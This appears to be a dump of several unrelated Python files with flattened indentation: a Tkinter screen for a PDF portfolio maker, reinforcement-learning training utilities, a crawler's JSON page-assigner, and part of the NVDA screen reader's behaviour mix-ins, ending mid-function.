self.b5.bind("<Button-1>", lambda e: self.initialize_new_section(self.window.current_subject.labs))
self.img6 = PhotoImage (file=f"resources/images/screen4/img6.png")
self.img6_hover = PhotoImage (file=f"resources/images/screen4/img6_hover.png")
self.b6 = Label(
image=self.img6,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b6.place (
x=33, y=798,
width=238,
height=86)
self.b6.bind("<Button-1>", lambda e: self.initialize_new_section(self.window.current_subject.project))
self.img7 = PhotoImage (file=f"resources/images/screen4/img7.png")
self.entry0_img = PhotoImage (file=f"resources/images/screen4/img_textBox0.png")
self.entry0_bg = self.canvas.create_image(
213.0, 185.0,
image=self.entry0_img)
self.entry0 = Entry (
bd=0,
bg="#ffffff",
highlightthickness=0)
self.entry0.place (
x=127.0, y=155,
width=172.0,
height=58)
self.img9 = PhotoImage (file=f"resources/images/screen4/img9.png")
self.img9_hover = PhotoImage (file=f"resources/images/screen4/img8_hover.png")
self.b9 = Label (
image=self.img9,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b9.place (
x=318, y=153,
width=62,
height=62)
self.b9.bind ("<Button-1>", lambda e: self.dropdown ())
self.img10 = PhotoImage (file=f"resources/images/screen4/img10.png")
self.img10_hover = PhotoImage (file=f"resources/images/screen4/img9_hover.png")
self.b10 = Label(
image=self.img10,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b10.place (
x=1190, y=156,
width=208,
height=53)
self.b10.bind("<Button-1>", func=lambda e: threading.Thread(target=self.window.merger_interface).start())
self.img11 = PhotoImage (file=f"resources/images/screen4/img11.png")
self.img11_hover = PhotoImage (file=f"resources/images/screen4/img10_hover.png")
self.b11 = Label (
image=self.img11,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b11.place (
x=952, y=155,
width=208,
height=53)
self.b11.bind("<Button-1>", lambda e: self.file_dialogue())
self.img12 = PhotoImage(file=f"resources/images/screen4/img12.png")
self.img12_hover = PhotoImage(file=f"resources/images/screen4/img11_hover.png")
self.b12 = Label(
image=self.img12,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b12.place(
x=714, y=155,
width=208,
height=53)
self.b12.bind("<Button-1>", lambda e: self.remove_selected_files())
self.img13_hover = PhotoImage(file=f"resources/images/screen4/switch_hover.png")
self.img13 = PhotoImage(file=f"resources/images/screen4/switch.png")
self.b13 = Label(
image=self.img13,
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b13.place(
x=476, y=155,
width=208,
height=53)
self.b13.bind("<Button-1>", func=lambda e: self.switch_files())
self.img14 = PhotoImage(file=f"resources/images/screen4/img14.png")
self.img14_hover = PhotoImage(file=f"resources/images/screen4/img14_hover.png")
self.b14 = Label(
image=self.img14,
bg="#83568a",
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b14.place(
x=1279, y=24,
width=50,
height=50)
self.b14.bind("<Button-1>", lambda e: self.openurl("https://github.com/SpadeQ22/portfolio-maker-repo/"))
self.img15 = PhotoImage(file=f"resources/images/screen4/img15.png")
self.img15_hover = PhotoImage(file=f"resources/images/screen4/img15_hover.png")
self.b15 = Label(
image=self.img15,
bg="#83568a",
borderwidth=0,
highlightthickness=0,
relief="flat")
self.b15.place(
x=1139, y=36,
width=100,
height=25)
self.b15.bind("<Button-1>", lambda e: self.openurl("https://www.linkedin.com/in/omaco2211/"))
self.wrapper = LabelFrame(self.canvas)
self.wrapper.pack(padx=405, pady=241)
self.canvas2 = Canvas(self.wrapper, height=703, width=969, bg="#fff", highlightthickness=0,
relief="ridge")
self.canvas2.pack(side=LEFT, fill=BOTH, expand=True)
self.vbar = ttk.Scrollbar(self.wrapper, orient=VERTICAL, command=self.canvas2.yview)
self.vbar.pack(side=RIGHT, fill=Y)
self.canvas2.configure(yscrollcommand=self.vbar.set)
self.canvas2.bind("<Configure>", func=lambda e: self.canvas2.configure(scrollregion=self.canvas2.bbox("all")))
self.myframe = Frame(self.canvas2, bg="#fff")
self.canvas2.create_window((0,0), window=self.myframe, anchor=NW)
self.myframe.bind("<Configure>", self.reset_scrollregion)
self.changeOnHoverButtons (self.b1, self.img1_hover, self.img1)
self.changeOnHoverButtons (self.b2, self.img2_hover, self.img2)
self.changeOnHoverButtons (self.b3, self.img3_hover, self.img3)
self.changeOnHoverButtons (self.b4, self.img4_hover, self.img4)
self.changeOnHoverButtons (self.b5, self.img5_hover, self.img5)
self.changeOnHoverButtons (self.b6, self.img6_hover, self.img6)
self.changeOnHoverButtons (self.b9, self.img9_hover, self.img9)
self.changeOnHoverButtons (self.b10, self.img10_hover, self.img10)
self.changeOnHoverButtons (self.b11, self.img11_hover, self.img11)
self.changeOnHoverButtons (self.b12, self.img12_hover, self.img12)
self.changeOnHoverButtons(self.b13, self.img13_hover, self.img13)
self.changeOnHoverButtons(self.b14, self.img14_hover, self.img14)
self.changeOnHoverButtons(self.b15, self.img15_hover, self.img15)
for subject in self.window.subjects:
self.add_option(subject)
self.initialize_new_subject()
def openurl(self, url):
webbrowser.open_new(url)
def initialize_new_subject(self):
self.entry0.delete(0, END)
self.entry0.insert(0, self.window.current_subject.ASU_course_code)
self.initialize_new_section(self.window.current_subject.assignments)
def initialize_new_section(self, section):
self.section = section
self.files = self.section.file_paths
self.cards = []
self.selected_cards = []
self.remove_cards()
self.set_cards()
def set_cards(self):
for path in self.files:
self.add_preview(path)
def reset_scrollregion(self, e):
self.canvas2.configure(scrollregion=self.canvas2.bbox("all"))
def changeOnHoverButtons(self, button, colorOnHover, colorOnLeave):
button.bind ("<Enter>", func=lambda e: button.config(
image=colorOnHover))
button.bind ("<Leave>", func=lambda e: button.config(
image=colorOnLeave))
def remove_cards(self):
self.row = 0
self.col = 0
for child in self.myframe.winfo_children():
child.destroy()
def remove_selected_files(self):
if len(self.selected_cards) > 0:
for child in self.selected_cards:
child.label.destroy()
self.cards = list(set(self.cards) - set(self.selected_cards))
self.files = [card.path for card in self.cards]
self.section.file_paths = self.files
self.selected_cards = []
self.reorganize()
def reorganize(self):
self.row = 0
self.col = 0
for file in self.cards:
file.label.grid(column=self.col % 4, row=self.row, padx=35, pady=20)
self.col += 1
if self.col % 4 == 0:
self.row += 1
def file_dialogue(self):
names = filedialog.askopenfilenames(filetypes=[('files', '.pdf')])
for name in names:
if name != "":
self.files.append(name)
self.add_preview(name)
self.section.file_paths = self.files
def add_preview(self, path):
print(path)
pages = convert_from_path(path, poppler_path="resources/poppler-0.68.0/bin", first_page=1, last_page=1)
img = pages[0]
img = img.resize((175, 248), Image.ANTIALIAS)
photoImg = ImageTk.PhotoImage(img)
self.images.append(photoImg)
self.add_file(path, os.path.basename(path).replace(".png", ".pdf"), self.images[len(self.images) - 1])
def add_file(self, path, file_name, img):
label = Label(self.myframe,
image=img,
bg="white",
height=300,
width=175,
borderwidth=0,
highlightthickness=0,
compound='top',
text=f"{file_name}",
fg="blue",
wraplength=170,
justify=CENTER)
label.grid(column=self.col % 4, row=self.row, padx=35, pady=20)
self.col += 1
if self.col % 4 == 0:
self.row += 1
card = Card(path, label)
self.changeOnHover(card)
self.cards.append(card)
def switch_files(self):
if len(self.selected_cards) == 2:
info_1 = self.selected_cards[0].label.grid_info()
info_2 = self.selected_cards[1].label.grid_info()
self.selected_cards[0].label.grid(info_2)
self.selected_cards[1].label.grid(info_1)
else:
tkinter.messagebox.showerror("Error", "Error 101: Exactly 2 Files Need to be Selected")
def select(self, button):
button.unbind("<Leave>")
button.config(bg="#93B5C6")
def unselect(self, button):
button.config(bg="white")
button.bind("<Leave>", func=lambda e: button.config(
bg="white"))
def clicked_file(self, card):
card.selected = not card.selected
if card.selected:
self.select(card.label)
self.selected_cards.append(card)
else:
self.unselect(card.label)
self.selected_cards.remove(card)
def changeOnHover(self, card):
card.label.bind("<Enter>", func=lambda e: card.label.configure(
bg="#93B5C6"))
card.label.bind("<Leave>", func=lambda e: card.label.configure(
bg="white"))
card.label.bind("<Button-1>", lambda e: self.clicked_file(card), add=True)
def display(self):
self.count -= 1
xcor = self.b0.winfo_x()
ycor = self.b0.winfo_y()
xcor2 = self.b2.winfo_x()
ycor2 = self.b2.winfo_y()
xcor3 = self.b3.winfo_x()
ycor3 = self.b3.winfo_y()
xcor4 = self.b4.winfo_x()
ycor4 = self.b4.winfo_y()
xcor5 = self.b5.winfo_x()
ycor5 = self.b5.winfo_y()
xcor6 = self.b6.winfo_x()
ycor6 = self.b6.winfo_y()
if self.count > 0 and not self.switch:
self.b0.place(x=xcor + 4.8, y=ycor)
self.b2.place(x=xcor2 + 4.8, y=ycor2)
self.b3.place(x=xcor3 + 4.8, y=ycor3)
self.b4.place(x=xcor4 + 4.8, y=ycor4)
self.b5.place(x=xcor5 + 4.8, y=ycor5)
self.b6.place(x=xcor6 + 4.8, y=ycor6)
display_event = self.window.after(10, self.display)
def hide(self):
self.count += 1
xcor = self.b0.winfo_x()
ycor = self.b0.winfo_y()
xcor2 = self.b2.winfo_x()
ycor2 = self.b2.winfo_y()
xcor3 = self.b3.winfo_x()
ycor3 = self.b3.winfo_y()
xcor4 = self.b4.winfo_x()
ycor4 = self.b4.winfo_y()
xcor5 = self.b5.winfo_x()
ycor5 = self.b5.winfo_y()
xcor6 = self.b6.winfo_x()
ycor6 = self.b6.winfo_y()
if self.count < 70 and self.switch:
self.b0.place(x=xcor - 5, y=ycor)
self.b2.place(x=xcor2 - 5, y=ycor2)
self.b3.place(x=xcor3 - 5, y=ycor3)
self.b4.place(x=xcor4 - 5, y=ycor4)
self.b5.place(x=xcor5 - 5, y=ycor5)
self.b6.place(x=xcor6 - 5, y=ycor6)
hide_event = self.window.after(10, self.hide)
def animate_up(self, button):
xcor = button.winfo_x()
ycor = button.winfo_y()
if ycor != 209:
button.place(x=xcor, y=ycor-1)
self.window.after(5, self.animate_up, button)
def animate(self):
self.switch = not self.switch
if self.switch:
self.hide()
else:
self.display()
def drop(self):
xcor = self.x_option
ycor = self.y_option
for option in self.options:
option.place(x=xcor, y=ycor)
ycor += 60
def up(self):
for option in self.options:
option.place_forget()
def dropdown(self):
self.drop_switch = not self.drop_switch
if self.drop_switch:
self.drop()
else:
self.up()
def add_option(self, subject):
option = Label(
image=self.img7,
borderwidth=1,
highlightthickness=1,
text=subject.ASU_course_code,
compound=CENTER,
relief="flat",
width=220,
height=60)
option.bind("<Button-1>", lambda e: self.set_current_subject(subject))
option.bind("<Enter>", func=lambda e: option.configure(
bg="#93B5C6"))
option.bind("<Leave>", func=lambda e: option.configure(
bg="white"))
self.options.append(option)
def set_current_subject(self, subject):
self.window.current_subject = subject
self.initialize_new_subject()
self.dropdown()
|
utils.py
|
import numpy as np
import torch
import torch.nn as nn
import torch.multiprocessing as mp
from torch.autograd import Variable
import gym
import argparse
import matplotlib.pyplot as plt
import seaborn as sns
import os
import datetime
import pickle
import time
from collections import deque
'''
@authors:
Nicklas Hansen,
Peter Ebert Christensen
'''
# Load CUDA
CUDA = False  # torch.cuda.is_available()
print('CUDA has been enabled.' if CUDA else 'CUDA has been disabled.')
# Define tensors
FloatTensor = torch.cuda.FloatTensor if CUDA else torch.FloatTensor
IntTensor = torch.cuda.IntTensor if CUDA else torch.IntTensor
LongTensor = torch.cuda.LongTensor if CUDA else torch.LongTensor
ByteTensor = torch.cuda.ByteTensor if CUDA else torch.ByteTensor
Tensor = FloatTensor
# Set global datetime
dt = str(datetime.datetime.now()).split('.')[0].replace(' ', '-')[5:]
class Agent(nn.Module):
# Interface for a neural RL agent
def __init__(self, args):
super(Agent, self).__init__()
_env = gym.make(args.env)
self.size_in = _env.observation_space.shape[0]
try:
self.size_out = _env.action_space.shape[0]
except Exception:
self.size_out = _env.action_space.n
if 'CarRacing' in args.env: self.size_out = 6
self.gamma = args.gamma
def forward(self, x):
return None
def normalized_init(self, weights, std=1.0):
x = torch.randn(weights.size())
x *= std / torch.sqrt((x**2).sum(1, keepdim=True))
return x
class Conv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, dilation=1, stride=1, padding=False):
super(Conv, self).__init__()
padding = int((kernel_size - 1) / 2) if padding else 0
self.conv = nn.Sequential(
nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, dilation=dilation, stride=stride,
padding=padding),
nn.ReLU()
)
def forward(self, x):
return self.conv(x)
def hogwild(model, args, train_func, test_func):
# Hogwild algorithm
model.share_memory()
processes = []
for rank in range(args.num_processes):
p = mp.Process(target=train_func, args=(model, args, rank))
p.start()
processes.append(p)
for p in processes:
p.join()
# Test trained model
test_func(model, args)
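# Hedged usage sketch (not part of the original file): how hogwild() might be
# invoked. `PolicyAgent`, `train_worker` and `evaluate` are assumed placeholders
# for an Agent subclass and worker functions defined elsewhere in this project.
def _example_hogwild_usage(args, PolicyAgent, train_worker, evaluate):
    # Build the shared model once in the parent process; hogwild() shares its
    # parameters, spawns args.num_processes training workers, joins them, and
    # finally runs the evaluation function on the trained model.
    model = PolicyAgent(args)
    hogwild(model, args, train_func=train_worker, test_func=evaluate)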
def init_hidden(batch_size, size_hidden):
# Initialize hidden states for an LSTM cell
hx = Variable(torch.zeros(batch_size, size_hidden))
cx = Variable(torch.zeros(batch_size, size_hidden))
return hx, cx
def plot(mean, std, args, labels=None, ylim_bot=None, save_path=None, walltime=None):
# Plots the learning of a worker
sns.set(style="darkgrid", font_scale=1.25)
plt.figure(figsize=(12,10))
if len(mean.shape) > 1 or walltime is not None:
for i in range(len(mean)):
if walltime is None:
iterations = np.array(range(len(mean[i]))) * args.print_freq
else:
iterations = walltime[i] / 60
plt.fill_between(iterations, mean[i]-std[i], mean[i]+std[i], alpha=0.2)
label = labels[i] if labels is not None else None
plt.plot(iterations, mean[i], label=f'A3C, {label}' if label is not None else 'A3C')
else:
iterations = np.array(range(len(mean))) * args.print_freq
if std is not None:
plt.fill_between(iterations, mean-std, mean+std, alpha=0.2)
plt.plot(iterations, mean, label='A3C')
plt.title(args.env)
plt.xlabel('Iteration' if walltime is None else 'Walltime (minutes)')
plt.ylabel('Mean reward')
plt.legend()
if len(iterations) > 1: plt.xlim(left=0, right=iterations[-1])
if ylim_bot is not None: plt.ylim(bottom=ylim_bot)
path = get_results_path() + 'reward.png' if save_path is None else save_path
plt.savefig(path)
plt.close()
def moving_average(a, n=10):
ret = np.cumsum(a, dtype=float)
ret[n:] = ret[n:] - ret[:-n]
return ret / n
def get_results_path(timestamp = dt):
path = os.getcwd() + '/results/' + timestamp + '/'
if not os.path.exists(path): os.makedirs(path)
return path
def save_rewards(rewards):
with open(get_results_path() + 'rewards.pkl', 'wb') as f:
pickle.dump(rewards, f)
def save_walltime(walltime):
with open(get_results_path() + 'walltime.pkl', 'wb') as f:
pickle.dump(walltime, f)
def save_model(model, args, rewards):
path = get_results_path()
torch.save(model.state_dict(), path + 'model.pkl')
with open(path + 'args.pkl', 'wb') as f:
pickle.dump(args, f)
save_rewards(rewards)
def load_args(timestamp):
path = get_results_path(timestamp)
with open(path + 'args.pkl', 'rb') as f:
return pickle.load(f)
def load_model(model, timestamp):
path = get_results_path(timestamp)
model.load_state_dict(torch.load(path + 'model.pkl'))
return model
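# Hedged usage sketch (not part of the original file): plot() only needs an object
# exposing .env and .print_freq, so a SimpleNamespace can stand in for the argparse
# namespace used elsewhere in this project; the reward numbers below are made up.
def _example_plot_usage():
    from types import SimpleNamespace
    fake_args = SimpleNamespace(env='CartPole-v1', print_freq=10)
    mean = np.array([10.0, 50.0, 120.0, 180.0])
    std = np.array([5.0, 12.0, 20.0, 15.0])
    # With save_path left as None this writes reward.png under
    # ./results/<timestamp>/, the directory created by get_results_path().
    plot(mean, std, fake_args)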
|
Assigner.py
|
#!/usr/bin/env python3
"""Parsing raw pages into JSON data for snippet crawler"""
from BaseLogger import BaseLogger
from DatabaseAccessor import DatabaseAccessor
from config import config_crawl_date_min, config_assign_process, config_idle_sleep
from contextlib import closing
from json import loads
from multiprocessing import Process
from platform import node
from re import sub
from time import sleep
class Assigner(BaseLogger):
def __init__(self, log_level=None):
BaseLogger.__init__(self, self.__class__.__name__, log_level)
self._db_conn = DatabaseAccessor()
self._log_info("assigner start @%s", node())
def close(self):
self._db_conn.close()
self._log_info("assigner exit")
self._close_logger()
def process(self):
url = None
job = self._db_conn.queue_page_take_raw()
if job is not None:
url = job['url']
text = job.get('text', "")
parse_result = self._parse_raw_page(url, text)
if parse_result is None:
self._log_warning("fail to parse '%s' as JSON in queue_page", url)
if not self._db_conn.queue_page_fail_raw(url):
self._log_warning("fail to mark %s as 'fail' in queue_page", url)
else:
if parse_result[0] is None:
self._log_warning("'%s' in queue_page indicates no more new content", url)
else:
self._log_info("%s indicates new crawling job: %s", url, parse_result[0])
if not self._db_conn.queue_crawl_create(parse_result[0]):
self._log_warning("fail to add %s as 'new' job in queue_crawl", parse_result[0])
if parse_result[1] is None:
self._log_warning("'%s' in queue_page contains no content", url)
else:
self._log_info("%s contains %d raw snippets", url, len(parse_result[1]))
if not self._db_conn.queue_page_done_raw(url, parse_result[1]):
self._log_warning("fail to append parsed data for %s in queue_page", url)
else:
self._log_warning("grab no jobs to assign")
sleep(config_idle_sleep)
return url
def _parse_raw_page(self, url, text):
try:
page_content = loads(text)
url_new, data_new = None, None
if (page_content["data"]["has_more"]) and (page_content["data"]["max_time"] > config_crawl_date_min):
url_new = sub(r"=(\d*)$", r"=" + str(page_content["data"]["max_time"]), url)
if len(page_content["data"]["data"]) > 0:
data_new = page_content["data"]["data"]
result = (url_new, data_new)
self._log_info(
"%s data status - more: %s, min: %d, max: %d",
url,
page_content["data"]["has_more"],
page_content["data"]["min_time"],
page_content["data"]["max_time"])
except Exception as e:
result = None
return result
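# Hedged illustration (not part of the original file): the JSON shape that
# _parse_raw_page() expects, reconstructed from the key lookups above. The field
# values and URL are made up; only the keys and the trailing "=<timestamp>"
# convention matter.
def _example_next_crawl_url():
    page = {
        "data": {
            "has_more": True,
            "min_time": 1500000000,
            "max_time": 1500003600,
            "data": [{"text": "snippet one"}, {"text": "snippet two"}],
        }
    }
    url = "http://example.com/api/feed?max_time=1500000000"
    # _parse_raw_page() rewrites the trailing "=<timestamp>" with max_time to build
    # the next crawl URL and passes the "data" list on as raw snippets.
    return sub(r"=(\d*)$", "=" + str(page["data"]["max_time"]), url)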
def main(times=10):
with closing(Assigner()) as assigner:
if times:
for _ in range(times):
assigner.process()
else:
while True:
assigner.process()
if __name__ == '__main__':
for _ in range(config_assign_process):
Process(target=main, args=(0,)).start()
|
behaviors.py
|
# -*- coding: UTF-8 -*-
# NVDAObjects/behaviors.py
# A part of NonVisual Desktop Access (NVDA)
# This file is covered by the GNU General Public License.
# See the file COPYING for more details.
# Copyright (C) 2006-2019 NV Access Limited, Peter Vágner, Joseph Lee, Bill Dengler
"""Mix-in classes which provide common behaviour for particular types of controls across different APIs.
The behaviours described here include table navigation commands for certain table rows, terminal input and output support, and the announcement of notifications and suggestion items, among others.
"""
import os
import time
import threading
import difflib
import tones
import queueHandler
import eventHandler
import controlTypes
import speech
import characterProcessing
import config
from . import NVDAObject, NVDAObjectTextInfo
import textInfos
import editableText
from logHandler import log
from scriptHandler import script
import api
import ui
import braille
import nvwave
class ProgressBar(NVDAObject):
progressValueCache={} #key is made of "speech" or "beep" and an x,y coordinate, value is the last percentage
def event_valueChange(self):
pbConf=config.conf["presentation"]["progressBarUpdates"]
states=self.states
if pbConf["progressBarOutputMode"]=="off" or controlTypes.STATE_INVISIBLE in states or controlTypes.STATE_OFFSCREEN in states:
return super(ProgressBar,self).event_valueChange()
val=self.value
try:
percentage = min(max(0.0, float(val.strip("%\0"))), 100.0)
except (AttributeError, ValueError):
log.debugWarning("Invalid value: %r" % val)
return super(ProgressBar, self).event_valueChange()
braille.handler.handleUpdate(self)
if not pbConf["reportBackgroundProgressBars"] and not self.isInForeground:
return
try:
left,top,width,height=self.location
except:
left=top=width=height=0
x = left + (width // 2)
y = top+ (height // 2)
lastBeepProgressValue=self.progressValueCache.get("beep,%d,%d"%(x,y),None)
if pbConf["progressBarOutputMode"] in ("beep","both") and (lastBeepProgressValue is None or abs(percentage-lastBeepProgressValue)>=pbConf["beepPercentageInterval"]):
tones.beep(pbConf["beepMinHZ"]*2**(percentage/25.0),40)
self.progressValueCache["beep,%d,%d"%(x,y)]=percentage
lastSpeechProgressValue=self.progressValueCache.get("speech,%d,%d"%(x,y),None)
if pbConf["progressBarOutputMode"] in ("speak","both") and (lastSpeechProgressValue is None or abs(percentage-lastSpeechProgressValue)>=pbConf["speechPercentageInterval"]):
queueHandler.queueFunction(queueHandler.eventQueue,speech.speakMessage,_("%d percent")%percentage)
self.progressValueCache["speech,%d,%d"%(x,y)]=percentage
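# Hedged worked example (not part of NVDA): the beep pitch used above is
# beepMinHZ * 2 ** (percentage / 25.0), i.e. the tone rises one octave per 25% of
# progress (x1 at 0%, x2 at 25%, x4 at 50%, x16 at 100%). 110 Hz is only an
# illustrative value for the configured minimum.
def _exampleProgressBeepHz(percentage, beepMinHZ=110):
    """Return the frequency that ProgressBar.event_valueChange would beep at."""
    return beepMinHZ * 2 ** (percentage / 25.0)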
class Dialog(NVDAObject):
"""Overrides the description property to obtain dialog text.
"""
@classmethod
def getDialogText(cls,obj,allowFocusedDescendants=True):
"""This classmethod walks through the children of the given object, and collects up and returns any text that seems to be part of a dialog's message text.
@param obj: the object whose children you want to collect the text from
@type obj: L{IAccessible}
@param allowFocusedDescendants: if false no text will be returned at all if one of the descendants is focused.
@type allowFocusedDescendants: boolean
"""
children=obj.children
textList=[]
childCount=len(children)
for index in range(childCount):
child=children[index]
childStates=child.states
childRole=child.role
#We don't want to handle invisible or unavailable objects
if controlTypes.STATE_INVISIBLE in childStates or controlTypes.STATE_UNAVAILABLE in childStates:
continue
#For particular objects, we want to descend in to them and get their children's message text
if childRole in (
controlTypes.ROLE_PROPERTYPAGE,
controlTypes.ROLE_PANE,
controlTypes.ROLE_PANEL,
controlTypes.ROLE_WINDOW,
controlTypes.ROLE_GROUPING,
controlTypes.ROLE_PARAGRAPH,
controlTypes.ROLE_SECTION,
controlTypes.ROLE_TEXTFRAME,
controlTypes.ROLE_UNKNOWN
):
#Grab text from descendants, but not for a child which inherits from Dialog and has focusable descendants
#Stops double reporting when focus is in a property page in a dialog
childText=cls.getDialogText(child,not isinstance(child,Dialog))
if childText:
textList.append(childText)
elif childText is None:
return None
continue
#If the child is focused we should just stop and return None
if not allowFocusedDescendants and controlTypes.STATE_FOCUSED in child.states:
return None
# We only want text from certain controls.
if not (
# Static text, labels and links
childRole in (controlTypes.ROLE_STATICTEXT,controlTypes.ROLE_LABEL,controlTypes.ROLE_LINK)
# Read-only, non-multiline edit fields
or (childRole==controlTypes.ROLE_EDITABLETEXT and controlTypes.STATE_READONLY in childStates and controlTypes.STATE_MULTILINE not in childStates)
):
continue
#We should ignore a text object directly after a grouping object, as it's probably the grouping's description
if index>0 and children[index-1].role==controlTypes.ROLE_GROUPING:
continue
#Like the last one, but a graphic might be before the grouping's description
if index>1 and children[index-1].role==controlTypes.ROLE_GRAPHIC and children[index-2].role==controlTypes.ROLE_GROUPING:
continue
childName=child.name
if childName and index<(childCount-1) and children[index+1].role not in (controlTypes.ROLE_GRAPHIC,controlTypes.ROLE_STATICTEXT,controlTypes.ROLE_SEPARATOR,controlTypes.ROLE_WINDOW,controlTypes.ROLE_PANE,controlTypes.ROLE_BUTTON) and children[index+1].name==childName:
# This is almost certainly the label for the next object, so skip it.
continue
isNameIncluded=child.TextInfo is NVDAObjectTextInfo or childRole in (controlTypes.ROLE_LABEL,controlTypes.ROLE_STATICTEXT)
childText=child.makeTextInfo(textInfos.POSITION_ALL).text
if not childText or childText.isspace() and child.TextInfo is not NVDAObjectTextInfo:
childText=child.basicText
isNameIncluded=True
if not isNameIncluded:
# The label isn't in the text, so explicitly include it first.
if childName:
textList.append(childName)
if childText:
textList.append(childText)
return "\n".join(textList)
def _get_description(self):
superDesc = super(Dialog, self).description
if superDesc and not superDesc.isspace():
# The object already provides a useful description, so don't override it.
return superDesc
return self.getDialogText(self)
value = None
def _get_isPresentableFocusAncestor(self):
# Only fetch this the first time it is requested,
# as it is very slow due to getDialogText and the answer shouldn't change anyway.
self.isPresentableFocusAncestor = res = super(Dialog, self).isPresentableFocusAncestor
return res
class EditableText(editableText.EditableText, NVDAObject):
"""Provides scripts to report appropriately when moving the caret in editable text fields.
This does not handle selection changes.
To handle selection changes, use either L{EditableTextWithAutoSelectDetection} or L{EditableTextWithoutAutoSelectDetection}.
"""
shouldFireCaretMovementFailedEvents = True
def initOverlayClass(self):
# #4264: the caret_newLine script can only be bound for processes other than NVDA's process
# As pressing enter on an edit field can cause modal dialogs to appear, yet gesture.send and api.processPendingEvents may call wx.Yield, which ends in a freeze.
if self.announceNewLineText and self.processID!=os.getpid():
self.bindGesture("kb:enter","caret_newLine")
self.bindGesture("kb:numpadEnter","caret_newLine")
class EditableTextWithAutoSelectDetection(EditableText):
"""In addition to L{EditableText}, handles reporting of selection changes for objects which notify of them.
To have selection changes reported, the object must notify of selection changes via the caret event.
Optionally, it may notify of changes to content via the textChange, textInsert and textRemove events.
If the object supports selection but does not notify of selection changes, L{EditableTextWithoutAutoSelectDetection} should be used instead.
"""
def event_gainFocus(self):
super(EditableText, self).event_gainFocus()
self.initAutoSelectDetection()
def event_caret(self):
super(EditableText, self).event_caret()
if self is api.getFocusObject() and not eventHandler.isPendingEvents('gainFocus'):
self.detectPossibleSelectionChange()
def event_textChange(self):
self.hasContentChangedSinceLastSelection = True
def event_textInsert(self):
self.hasContentChangedSinceLastSelection = True
def event_textRemove(self):
self.hasContentChangedSinceLastSelection = True
class EditableTextWithoutAutoSelectDetection(editableText.EditableTextWithoutAutoSelectDetection, EditableText):
"""In addition to L{EditableText}, provides scripts to report appropriately when the selection changes.
This should be used when an object does not notify of selection changes.
"""
initOverlayClass = editableText.EditableTextWithoutAutoSelectDetection.initClass
class LiveText(NVDAObject):
"""An object for which new text should be reported automatically.
These objects present text as a single chunk
and only fire an event indicating that some part of the text has changed; i.e. they don't provide the new text.
Monitoring must be explicitly started and stopped using the L{startMonitoring} and L{stopMonitoring} methods.
The object should notify of text changes using the textChange event.
"""
#: The time to wait before fetching text after a change event.
STABILIZE_DELAY = 0
# If the text is live, this is definitely content.
presentationType = NVDAObject.presType_content
announceNewLineText=False
def initOverlayClass(self):
self._event = threading.Event()
self._monitorThread = None
self._keepMonitoring = False
def startMonitoring(self):
"""Start monitoring for new text.
New text will be reported when it is detected.
@note: If monitoring has already been started, this will have no effect.
@see: L{stopMonitoring}
"""
if self._monitorThread:
return
thread = self._monitorThread = threading.Thread(target=self._monitor)
thread.daemon = True
self._keepMonitoring = True
self._event.clear()
thread.start()
def stopMonitoring(self):
"""Stop monitoring previously started with L{startMonitoring}.
@note: If monitoring has not been started, this will have no effect.
@see: L{startMonitoring}
"""
if not self._monitorThread:
return
self._keepMonitoring = False
self._event.set()
self._monitorThread = None
def event_textChange(self):
"""Fired when the text changes.
@note: It is safe to call this directly from threads other than the main thread.
"""
self._event.set()
def _getTextLines(self):
"""Retrieve the text of this object in lines.
This will be used to determine the new text to speak.
The base implementation uses the L{TextInfo}.
However, subclasses should override this if there is a better way to retrieve the text.
@return: The current lines of text.
@rtype: list of str
"""
return list(self.makeTextInfo(textInfos.POSITION_ALL).getTextInChunks(textInfos.UNIT_LINE))
def _reportNewLines(self, lines):
"""
Reports new lines of text using _reportNewText for each new line.
Subclasses may override this method to provide custom filtering of new text,
where logic depends on multiple lines.
"""
for line in lines:
self._reportNewText(line)
def _reportNewText(self, line):
"""Report a line of new text.
"""
speech.speakText(line)
def _monitor(self):
try:
oldLines = self._getTextLines()
except:
log.exception("Error getting initial lines")
oldLines = []
while self._keepMonitoring:
self._event.wait()
if not self._keepMonitoring:
break
if self.STABILIZE_DELAY > 0:
# wait for the text to stabilise.
time.sleep(self.STABILIZE_DELAY)
if not self._keepMonitoring:
# Monitoring was stopped while waiting for the text to stabilise.
break
self._event.clear()
try:
newLines = self._getTextLines()
if config.conf["presentation"]["reportDynamicContentChanges"]:
outLines = self._calculateNewText(newLines, oldLines)
if len(outLines) == 1 and len(outLines[0].strip()) == 1:
# This is only a single character,
# which probably means it is just a typed character,
# so ignore it.
del outLines[0]
if outLines:
queueHandler.queueFunction(queueHandler.eventQueue, self._reportNewLines, outLines)
oldLines = newLines
except:
log.exception("Error getting lines or calculating new text")
def _calculateNewText(self, newLines, oldLines):
outLines = []
prevLine = None
for line in difflib.ndiff(oldLines, newLines):
if line[0] == "?":
# We're never interested in these.
continue
if line[0] != "+":
# We're only interested in new lines.
prevLine = line
continue
text = line[2:]
if not text or text.isspace():
prevLine = line
continue
if prevLine and prevLine[0] == "-" and len(prevLine) > 2:
# It's possible that only a few characters have changed in this line.
# If so, we want to speak just the changed section, rather than the entire line.
prevText = prevLine[2:]
textLen = len(text)
prevTextLen = len(prevText)
# Find the first character that differs between the two lines.
for pos in range(min(textLen, prevTextLen)):
if text[pos] != prevText[pos]:
start = pos
break
else:
# We haven't found a differing character so far and we've hit the end of one of the lines.
# This means that the differing text starts here.
start = pos + 1
# Find the end of the differing text.
if textLen != prevTextLen:
# The lines are different lengths, so assume the rest of the line changed.
end = textLen
else:
for pos in range(textLen - 1, start - 1, -1):
if text[pos] != prevText[pos]:
end = pos + 1
break
if end - start < 15:
# Less than 15 characters have changed, so only speak the changed chunk.
text = text[start:end]
if text and not text.isspace():
outLines.append(text)
prevLine = line
return outLines
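# Hedged illustration (not part of NVDA): _calculateNewText() above consumes the
# one-character prefixes produced by difflib.ndiff ("+" added, "-" removed,
# "?" intraline hint, " " unchanged). This helper, which reuses the difflib import
# at the top of this module, simply groups ndiff output by that prefix.
def _exampleNdiffPrefixes(oldLines, newLines):
    groups = {"+": [], "-": [], "?": [], " ": []}
    for line in difflib.ndiff(oldLines, newLines):
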